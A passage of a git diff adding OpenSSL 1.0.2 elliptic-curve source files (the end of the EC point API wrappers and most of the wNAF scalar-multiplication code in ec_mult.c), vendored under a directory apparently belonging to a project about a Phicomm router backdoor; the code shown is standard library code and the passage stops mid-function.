+int EC_POINT_set_affine_coordinates_GFp(const EC_GROUP *group,
+                                        EC_POINT *point, const BIGNUM *x,
+                                        const BIGNUM *y, BN_CTX *ctx)
+{
+    if (group->meth->point_set_affine_coordinates == 0) {
+        ECerr(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_set_affine_coordinates(group, point, x, y, ctx);
+}
+
+#ifndef OPENSSL_NO_EC2M
+int EC_POINT_set_affine_coordinates_GF2m(const EC_GROUP *group,
+                                         EC_POINT *point, const BIGNUM *x,
+                                         const BIGNUM *y, BN_CTX *ctx)
+{
+    if (group->meth->point_set_affine_coordinates == 0) {
+        ECerr(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_set_affine_coordinates(group, point, x, y, ctx);
+}
+#endif
+
+int EC_POINT_get_affine_coordinates_GFp(const EC_GROUP *group,
+                                        const EC_POINT *point, BIGNUM *x,
+                                        BIGNUM *y, BN_CTX *ctx)
+{
+    if (group->meth->point_get_affine_coordinates == 0) {
+        ECerr(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_get_affine_coordinates(group, point, x, y, ctx);
+}
+
+#ifndef OPENSSL_NO_EC2M
+int EC_POINT_get_affine_coordinates_GF2m(const EC_GROUP *group,
+                                         const EC_POINT *point, BIGNUM *x,
+                                         BIGNUM *y, BN_CTX *ctx)
+{
+    if (group->meth->point_get_affine_coordinates == 0) {
+        ECerr(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M,
+              EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->point_get_affine_coordinates(group, point, x, y, ctx);
+}
+#endif
+
+int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                 const EC_POINT *b, BN_CTX *ctx)
+{
+    if (group->meth->add == 0) {
+        ECerr(EC_F_EC_POINT_ADD, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if ((group->meth != r->meth) || (r->meth != a->meth)
+        || (a->meth != b->meth)) {
+        ECerr(EC_F_EC_POINT_ADD, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->add(group, r, a, b, ctx);
+}
+
+int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                 BN_CTX *ctx)
+{
+    if (group->meth->dbl == 0) {
+        ECerr(EC_F_EC_POINT_DBL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if ((group->meth != r->meth) || (r->meth != a->meth)) {
+        ECerr(EC_F_EC_POINT_DBL, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->dbl(group, r, a, ctx);
+}
+
+int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx)
+{
+    if (group->meth->invert == 0) {
+        ECerr(EC_F_EC_POINT_INVERT, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != a->meth) {
+        ECerr(EC_F_EC_POINT_INVERT, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->invert(group, a, ctx);
+}
+
+int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *point)
+{
+    if (group->meth->is_at_infinity == 0) {
+        ECerr(EC_F_EC_POINT_IS_AT_INFINITY,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_IS_AT_INFINITY, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->is_at_infinity(group, point);
+}
+
+int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point,
+                         BN_CTX *ctx)
+{
+    if (group->meth->is_on_curve == 0) {
+        ECerr(EC_F_EC_POINT_IS_ON_CURVE, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_IS_ON_CURVE, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->is_on_curve(group, point, ctx);
+}
+
+int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b,
+                 BN_CTX *ctx)
+{
+    if (group->meth->point_cmp == 0) {
+        ECerr(EC_F_EC_POINT_CMP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return -1;
+    }
+    if ((group->meth != a->meth) || (a->meth != b->meth)) {
+        ECerr(EC_F_EC_POINT_CMP, EC_R_INCOMPATIBLE_OBJECTS);
+        return -1;
+    }
+    return group->meth->point_cmp(group, a, b, ctx);
+}
+
+int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx)
+{
+    if (group->meth->make_affine == 0) {
+        ECerr(EC_F_EC_POINT_MAKE_AFFINE, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (group->meth != point->meth) {
+        ECerr(EC_F_EC_POINT_MAKE_AFFINE, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+    return group->meth->make_affine(group, point, ctx);
+}
+
+int EC_POINTs_make_affine(const EC_GROUP *group, size_t num,
+                          EC_POINT *points[], BN_CTX *ctx)
+{
+    size_t i;
+
+    if (group->meth->points_make_affine == 0) {
+        ECerr(EC_F_EC_POINTS_MAKE_AFFINE, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    for (i = 0; i < num; i++) {
+        if (group->meth != points[i]->meth) {
+            ECerr(EC_F_EC_POINTS_MAKE_AFFINE, EC_R_INCOMPATIBLE_OBJECTS);
+            return 0;
+        }
+    }
+    return group->meth->points_make_affine(group, num, points, ctx);
+}
+
+/*
+ * Functions for point multiplication. If group->meth->mul is 0, we use the
+ * wNAF-based implementations in ec_mult.c; otherwise we dispatch through
+ * methods.
+ */
+
+int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *scalar,
+                  size_t num, const EC_POINT *points[],
+                  const BIGNUM *scalars[], BN_CTX *ctx)
+{
+    if (group->meth->mul == 0)
+        /* use default */
+        return ec_wNAF_mul(group, r, scalar, num, points, scalars, ctx);
+
+    return group->meth->mul(group, r, scalar, num, points, scalars, ctx);
+}
+
+int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *g_scalar,
+                 const EC_POINT *point, const BIGNUM *p_scalar, BN_CTX *ctx)
+{
+    /* just a convenient interface to EC_POINTs_mul() */
+
+    const EC_POINT *points[1];
+    const BIGNUM *scalars[1];
+
+    points[0] = point;
+    scalars[0] = p_scalar;
+
+    return EC_POINTs_mul(group, r, g_scalar,
+                         (point != NULL
+                          && p_scalar != NULL), points, scalars, ctx);
+}
+
+int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    if (group->meth->mul == 0)
+        /* use default */
+        return ec_wNAF_precompute_mult(group, ctx);
+
+    if (group->meth->precompute_mult != 0)
+        return group->meth->precompute_mult(group, ctx);
+    else
+        return 1;               /* nothing to do, so report success */
+}
+
+int EC_GROUP_have_precompute_mult(const EC_GROUP *group)
+{
+    if (group->meth->mul == 0)
+        /* use default */
+        return ec_wNAF_have_precompute_mult(group);
+
+    if (group->meth->have_precompute_mult != 0)
+        return group->meth->have_precompute_mult(group);
+    else
+        return 0;               /* cannot tell whether precomputation has
+                                 * been performed */
+}
+
+/*
+ * ec_precompute_mont_data sets |group->mont_data| from |group->order| and
+ * returns one on success. On error it returns zero.
+ */
+int ec_precompute_mont_data(EC_GROUP *group)
+{
+    BN_CTX *ctx = BN_CTX_new();
+    int ret = 0;
+
+    if (!EC_GROUP_VERSION(group))
+        goto err;
+
+    if (group->mont_data) {
+        BN_MONT_CTX_free(group->mont_data);
+        group->mont_data = NULL;
+    }
+
+    if (ctx == NULL)
+        goto err;
+
+    group->mont_data = BN_MONT_CTX_new();
+    if (!group->mont_data)
+        goto err;
+
+    if (!BN_MONT_CTX_set(group->mont_data, &group->order, ctx)) {
+        BN_MONT_CTX_free(group->mont_data);
+        group->mont_data = NULL;
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+
+    if (ctx)
+        BN_CTX_free(ctx);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_mult.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_mult.c
new file mode 100644
index 0000000..23b8c30
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_mult.c
@@ -0,0 +1,913 @@
+/* crypto/ec/ec_mult.c */
+/*
+ * Originally written by Bodo Moeller and Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions of this software developed by SUN MICROSYSTEMS, INC.,
+ * and contributed to the OpenSSL project.
+ */
+
+#include <string.h>
+
+#include <openssl/err.h>
+
+#include "ec_lcl.h"
+
+/*
+ * This file implements the wNAF-based interleaving multi-exponentation method
+ * (<URL:http://www.informatik.tu-darmstadt.de/TI/Mitarbeiter/moeller.html#multiexp>);
+ * for multiplication with precomputation, we use wNAF splitting
+ * (<URL:http://www.informatik.tu-darmstadt.de/TI/Mitarbeiter/moeller.html#fastexp>).
+ */
+
+/* structure for precomputed multiples of the generator */
+typedef struct ec_pre_comp_st {
+    const EC_GROUP *group;      /* parent EC_GROUP object */
+    size_t blocksize;           /* block size for wNAF splitting */
+    size_t numblocks;           /* max. number of blocks for which we have
+                                 * precomputation */
+    size_t w;                   /* window size */
+    EC_POINT **points;          /* array with pre-calculated multiples of
+                                 * generator: 'num' pointers to EC_POINT
+                                 * objects followed by a NULL */
+    size_t num;                 /* numblocks * 2^(w-1) */
+    int references;
+} EC_PRE_COMP;
+
+/* functions to manage EC_PRE_COMP within the EC_GROUP extra_data framework */
+static void *ec_pre_comp_dup(void *);
+static void ec_pre_comp_free(void *);
+static void ec_pre_comp_clear_free(void *);
+
+static EC_PRE_COMP *ec_pre_comp_new(const EC_GROUP *group)
+{
+    EC_PRE_COMP *ret = NULL;
+
+    if (!group)
+        return NULL;
+
+    ret = (EC_PRE_COMP *)OPENSSL_malloc(sizeof(EC_PRE_COMP));
+    if (!ret) {
+        ECerr(EC_F_EC_PRE_COMP_NEW, ERR_R_MALLOC_FAILURE);
+        return ret;
+    }
+    ret->group = group;
+    ret->blocksize = 8;         /* default */
+    ret->numblocks = 0;
+    ret->w = 4;                 /* default */
+    ret->points = NULL;
+    ret->num = 0;
+    ret->references = 1;
+    return ret;
+}
+
+static void *ec_pre_comp_dup(void *src_)
+{
+    EC_PRE_COMP *src = src_;
+
+    /* no need to actually copy, these objects never change! */
+
+    CRYPTO_add(&src->references, 1, CRYPTO_LOCK_EC_PRE_COMP);
+
+    return src_;
+}
+
+static void ec_pre_comp_free(void *pre_)
+{
+    int i;
+    EC_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    if (pre->points) {
+        EC_POINT **p;
+
+        for (p = pre->points; *p != NULL; p++)
+            EC_POINT_free(*p);
+        OPENSSL_free(pre->points);
+    }
+    OPENSSL_free(pre);
+}
+
+static void ec_pre_comp_clear_free(void *pre_)
+{
+    int i;
+    EC_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    if (pre->points) {
+        EC_POINT **p;
+
+        for (p = pre->points; *p != NULL; p++) {
+            EC_POINT_clear_free(*p);
+            OPENSSL_cleanse(p, sizeof *p);
+        }
+        OPENSSL_free(pre->points);
+    }
+    OPENSSL_cleanse(pre, sizeof *pre);
+    OPENSSL_free(pre);
+}
+
+/*-
+ * Determine the modified width-(w+1) Non-Adjacent Form (wNAF) of 'scalar'.
+ * This is an array  r[]  of values that are either zero or odd with an
+ * absolute value less than  2^w  satisfying
+ *     scalar = \sum_j r[j]*2^j
+ * where at most one of any  w+1  consecutive digits is non-zero
+ * with the exception that the most significant digit may be only
+ * w-1 zeros away from that next non-zero digit.
+ */
+static signed char *compute_wNAF(const BIGNUM *scalar, int w, size_t *ret_len)
+{
+    int window_val;
+    int ok = 0;
+    signed char *r = NULL;
+    int sign = 1;
+    int bit, next_bit, mask;
+    size_t len = 0, j;
+
+    if (BN_is_zero(scalar)) {
+        r = OPENSSL_malloc(1);
+        if (!r) {
+            ECerr(EC_F_COMPUTE_WNAF, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        r[0] = 0;
+        *ret_len = 1;
+        return r;
+    }
+
+    if (w <= 0 || w > 7) {      /* 'signed char' can represent integers with
+                                 * absolute values less than 2^7 */
+        ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+    bit = 1 << w;               /* at most 128 */
+    next_bit = bit << 1;        /* at most 256 */
+    mask = next_bit - 1;        /* at most 255 */
+
+    if (BN_is_negative(scalar)) {
+        sign = -1;
+    }
+
+    if (scalar->d == NULL || scalar->top == 0) {
+        ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+
+    len = BN_num_bits(scalar);
+    r = OPENSSL_malloc(len + 1); /* modified wNAF may be one digit longer
+                                  * than binary representation (*ret_len will
+                                  * be set to the actual length, i.e. at most
+                                  * BN_num_bits(scalar) + 1) */
+    if (r == NULL) {
+        ECerr(EC_F_COMPUTE_WNAF, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    window_val = scalar->d[0] & mask;
+    j = 0;
+    while ((window_val != 0) || (j + w + 1 < len)) { /* if j+w+1 >= len,
+                                                      * window_val will not
+                                                      * increase */
+        int digit = 0;
+
+        /* 0 <= window_val <= 2^(w+1) */
+
+        if (window_val & 1) {
+            /* 0 < window_val < 2^(w+1) */
+
+            if (window_val & bit) {
+                digit = window_val - next_bit; /* -2^w < digit < 0 */
+
+#if 1                           /* modified wNAF */
+                if (j + w + 1 >= len) {
+                    /*
+                     * special case for generating modified wNAFs: no new
+                     * bits will be added into window_val, so using a
+                     * positive digit here will decrease the total length of
+                     * the representation
+                     */
+
+                    digit = window_val & (mask >> 1); /* 0 < digit < 2^w */
+                }
+#endif
+            } else {
+                digit = window_val; /* 0 < digit < 2^w */
+            }
+
+            if (digit <= -bit || digit >= bit || !(digit & 1)) {
+                ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            window_val -= digit;
+
+            /*
+             * now window_val is 0 or 2^(w+1) in standard wNAF generation;
+             * for modified window NAFs, it may also be 2^w
+             */
+            if (window_val != 0 && window_val != next_bit
+                && window_val != bit) {
+                ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+        }
+
+        r[j++] = sign * digit;
+
+        window_val >>= 1;
+        window_val += bit * BN_is_bit_set(scalar, j + w);
+
+        if (window_val > next_bit) {
+            ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+    }
+
+    if (j > len + 1) {
+        ECerr(EC_F_COMPUTE_WNAF, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+    len = j;
+    ok = 1;
+
+ err:
+    if (!ok) {
+        OPENSSL_free(r);
+        r = NULL;
+    }
+    if (ok)
+        *ret_len = len;
+    return r;
+}
+
+/*
+ * TODO: table should be optimised for the wNAF-based implementation,
+ * sometimes smaller windows will give better performance (thus the
+ * boundaries should be increased)
+ */
+#define EC_window_bits_for_scalar_size(b) \
+                ((size_t) \
+                 ((b) >= 2000 ? 6 : \
+                  (b) >=  800 ? 5 : \
+                  (b) >=  300 ? 4 : \
+                  (b) >=   70 ? 3 : \
+                  (b) >=   20 ? 2 : \
+                  1))
+
+/*-
+ * Compute
+ *      \sum scalars[i]*points[i],
+ * also including
+ *      scalar*generator
+ * in the addition if scalar != NULL
+ */
+int ec_wNAF_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *scalar,
+                size_t num, const EC_POINT *points[], const BIGNUM *scalars[],
+                BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    const EC_POINT *generator = NULL;
+    EC_POINT *tmp = NULL;
+    size_t totalnum;
+    size_t blocksize = 0, numblocks = 0; /* for wNAF splitting */
+    size_t pre_points_per_block = 0;
+    size_t i, j;
+    int k;
+    int r_is_inverted = 0;
+    int r_is_at_infinity = 1;
+    size_t *wsize = NULL;       /* individual window sizes */
+    signed char **wNAF = NULL;  /* individual wNAFs */
+    size_t *wNAF_len = NULL;
+    size_t max_len = 0;
+    size_t num_val;
+    EC_POINT **val = NULL;      /* precomputation */
+    EC_POINT **v;
+    EC_POINT ***val_sub = NULL; /* pointers to sub-arrays of 'val' or
+                                 * 'pre_comp->points' */
+    const EC_PRE_COMP *pre_comp = NULL;
+    int num_scalar = 0;         /* flag: will be set to 1 if 'scalar' must be
+                                 * treated like other scalars, i.e.
+                                 * precomputation is not available */
+    int ret = 0;
+
+    if (group->meth != r->meth) {
+        ECerr(EC_F_EC_WNAF_MUL, EC_R_INCOMPATIBLE_OBJECTS);
+        return 0;
+    }
+
+    if ((scalar == NULL) && (num == 0)) {
+        return EC_POINT_set_to_infinity(group, r);
+    }
+
+    for (i = 0; i < num; i++) {
+        if (group->meth != points[i]->meth) {
+            ECerr(EC_F_EC_WNAF_MUL, EC_R_INCOMPATIBLE_OBJECTS);
+            return 0;
+        }
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            goto err;
+    }
+
+    if (scalar != NULL) {
+        generator = EC_GROUP_get0_generator(group);
+        if (generator == NULL) {
+            ECerr(EC_F_EC_WNAF_MUL, EC_R_UNDEFINED_GENERATOR);
+            goto err;
+        }
+
+        /* look if we can use precomputed multiples of generator */
+
+        pre_comp =
+            EC_EX_DATA_get_data(group->extra_data, ec_pre_comp_dup,
+                                ec_pre_comp_free, ec_pre_comp_clear_free);
+
+        if (pre_comp && pre_comp->numblocks
+            && (EC_POINT_cmp(group, generator, pre_comp->points[0], ctx) ==
+                0)) {
+            blocksize = pre_comp->blocksize;
+
+            /*
+             * determine maximum number of blocks that wNAF splitting may
+             * yield (NB: maximum wNAF length is bit length plus one)
+             */
+            numblocks = (BN_num_bits(scalar) / blocksize) + 1;
+
+            /*
+             * we cannot use more blocks than we have precomputation for
+             */
+            if (numblocks > pre_comp->numblocks)
+                numblocks = pre_comp->numblocks;
+
+            pre_points_per_block = (size_t)1 << (pre_comp->w - 1);
+
+            /* check that pre_comp looks sane */
+            if (pre_comp->num != (pre_comp->numblocks * pre_points_per_block)) {
+                ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+        } else {
+            /* can't use precomputation */
+            pre_comp = NULL;
+            numblocks = 1;
+            num_scalar = 1;     /* treat 'scalar' like 'num'-th element of
+                                 * 'scalars' */
+        }
+    }
+
+    totalnum = num + numblocks;
+
+    wsize = OPENSSL_malloc(totalnum * sizeof wsize[0]);
+    wNAF_len = OPENSSL_malloc(totalnum * sizeof wNAF_len[0]);
+    wNAF = OPENSSL_malloc((totalnum + 1) * sizeof wNAF[0]); /* includes space
+                                                             * for pivot */
+    val_sub = OPENSSL_malloc(totalnum * sizeof val_sub[0]);
+
+    /* Ensure wNAF is initialised in case we end up going to err */
+    if (wNAF)
+        wNAF[0] = NULL;         /* preliminary pivot */
+
+    if (!wsize || !wNAF_len || !wNAF || !val_sub) {
+        ECerr(EC_F_EC_WNAF_MUL, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /*
+     * num_val will be the total number of temporarily precomputed points
+     */
+    num_val = 0;
+
+    for (i = 0; i < num + num_scalar; i++) {
+        size_t bits;
+
+        bits = i < num ? BN_num_bits(scalars[i]) : BN_num_bits(scalar);
+        wsize[i] = EC_window_bits_for_scalar_size(bits);
+        num_val += (size_t)1 << (wsize[i] - 1);
+        wNAF[i + 1] = NULL;     /* make sure we always have a pivot */
+        wNAF[i] =
+            compute_wNAF((i < num ? scalars[i] : scalar), wsize[i],
+                         &wNAF_len[i]);
+        if (wNAF[i] == NULL)
+            goto err;
+        if (wNAF_len[i] > max_len)
+            max_len = wNAF_len[i];
+    }
+
+    if (numblocks) {
+        /* we go here iff scalar != NULL */
+
+        if (pre_comp == NULL) {
+            if (num_scalar != 1) {
+                ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            /* we have already generated a wNAF for 'scalar' */
+        } else {
+            signed char *tmp_wNAF = NULL;
+            size_t tmp_len = 0;
+
+            if (num_scalar != 0) {
+                ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            /*
+             * use the window size for which we have precomputation
+             */
+            wsize[num] = pre_comp->w;
+            tmp_wNAF = compute_wNAF(scalar, wsize[num], &tmp_len);
+            if (!tmp_wNAF)
+                goto err;
+
+            if (tmp_len <= max_len) {
+                /*
+                 * One of the other wNAFs is at least as long as the wNAF
+                 * belonging to the generator, so wNAF splitting will not buy
+                 * us anything.
+                 */
+
+                numblocks = 1;
+                totalnum = num + 1; /* don't use wNAF splitting */
+                wNAF[num] = tmp_wNAF;
+                wNAF[num + 1] = NULL;
+                wNAF_len[num] = tmp_len;
+                if (tmp_len > max_len)
+                    max_len = tmp_len;
+                /*
+                 * pre_comp->points starts with the points that we need here:
+                 */
+                val_sub[num] = pre_comp->points;
+            } else {
+                /*
+                 * don't include tmp_wNAF directly into wNAF array - use wNAF
+                 * splitting and include the blocks
+                 */
+
+                signed char *pp;
+                EC_POINT **tmp_points;
+
+                if (tmp_len < numblocks * blocksize) {
+                    /*
+                     * possibly we can do with fewer blocks than estimated
+                     */
+                    numblocks = (tmp_len + blocksize - 1) / blocksize;
+                    if (numblocks > pre_comp->numblocks) {
+                        ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                        goto err;
+                    }
+                    totalnum = num + numblocks;
+                }
+
+                /* split wNAF in 'numblocks' parts */
+                pp = tmp_wNAF;
+                tmp_points = pre_comp->points;
+
+                for (i = num; i < totalnum; i++) {
+                    if (i < totalnum - 1) {
+                        wNAF_len[i] = blocksize;
+                        if (tmp_len < blocksize) {
+                            ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                            goto err;
+                        }
+                        tmp_len -= blocksize;
+                    } else
+                        /*
+                         * last block gets whatever is left (this could be
+                         * more or less than 'blocksize'!)
+                         */
+                        wNAF_len[i] = tmp_len;
+
+                    wNAF[i + 1] = NULL;
+                    wNAF[i] = OPENSSL_malloc(wNAF_len[i]);
+                    if (wNAF[i] == NULL) {
+                        ECerr(EC_F_EC_WNAF_MUL, ERR_R_MALLOC_FAILURE);
+                        OPENSSL_free(tmp_wNAF);
+                        goto err;
+                    }
+                    memcpy(wNAF[i], pp, wNAF_len[i]);
+                    if (wNAF_len[i] > max_len)
+                        max_len = wNAF_len[i];
+
+                    if (*tmp_points == NULL) {
+                        ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+                        OPENSSL_free(tmp_wNAF);
+                        goto err;
+                    }
+                    val_sub[i] = tmp_points;
+                    tmp_points += pre_points_per_block;
+                    pp += blocksize;
+                }
+                OPENSSL_free(tmp_wNAF);
+            }
+        }
+    }
+
+    /*
+     * All points we precompute now go into a single array 'val'.
+     * 'val_sub[i]' is a pointer to the subarray for the i-th point, or to a
+     * subarray of 'pre_comp->points' if we already have precomputation.
+     */
+    val = OPENSSL_malloc((num_val + 1) * sizeof val[0]);
+    if (val == NULL) {
+        ECerr(EC_F_EC_WNAF_MUL, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    val[num_val] = NULL;        /* pivot element */
+
+    /* allocate points for precomputation */
+    v = val;
+    for (i = 0; i < num + num_scalar; i++) {
+        val_sub[i] = v;
+        for (j = 0; j < ((size_t)1 << (wsize[i] - 1)); j++) {
+            *v = EC_POINT_new(group);
+            if (*v == NULL)
+                goto err;
+            v++;
+        }
+    }
+    if (!(v == val + num_val)) {
+        ECerr(EC_F_EC_WNAF_MUL, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+
+    if (!(tmp = EC_POINT_new(group)))
+        goto err;
+
+    /*-
+     * prepare precomputed values:
+     *    val_sub[i][0] :=     points[i]
+     *    val_sub[i][1] := 3 * points[i]
+     *    val_sub[i][2] := 5 * points[i]
+     *    ...
+     */
+    for (i = 0; i < num + num_scalar; i++) {
+        if (i < num) {
+            if (!EC_POINT_copy(val_sub[i][0], points[i]))
+                goto err;
+        } else {
+            if (!EC_POINT_copy(val_sub[i][0], generator))
+                goto err;
+        }
+
+        if (wsize[i] > 1) {
+            if (!EC_POINT_dbl(group, tmp, val_sub[i][0], ctx))
+                goto err;
+            for (j = 1; j < ((size_t)1 << (wsize[i] - 1)); j++) {
+                if (!EC_POINT_add
+                    (group, val_sub[i][j], val_sub[i][j - 1], tmp, ctx))
+                    goto err;
+            }
+        }
+    }
+
+#if 1                           /* optional; EC_window_bits_for_scalar_size
+                                 * assumes we do this step */
+    if (!EC_POINTs_make_affine(group, num_val, val, ctx))
+        goto err;
+#endif
+
+    r_is_at_infinity = 1;
+
+    for (k = max_len - 1; k >= 0; k--) {
+        if (!r_is_at_infinity) {
+            if (!EC_POINT_dbl(group, r, r, ctx))
+                goto err;
+        }
+
+        for (i = 0; i < totalnum; i++) {
+            if (wNAF_len[i] > (size_t)k) {
+                int digit = wNAF[i][k];
+                int is_neg;
+
+                if (digit) {
+                    is_neg = digit < 0;
+
+                    if (is_neg)
+                        digit = -digit;
+
+                    if (is_neg != r_is_inverted) {
+                        if (!r_is_at_infinity) {
+                            if (!EC_POINT_invert(group, r, ctx))
+                                goto err;
+                        }
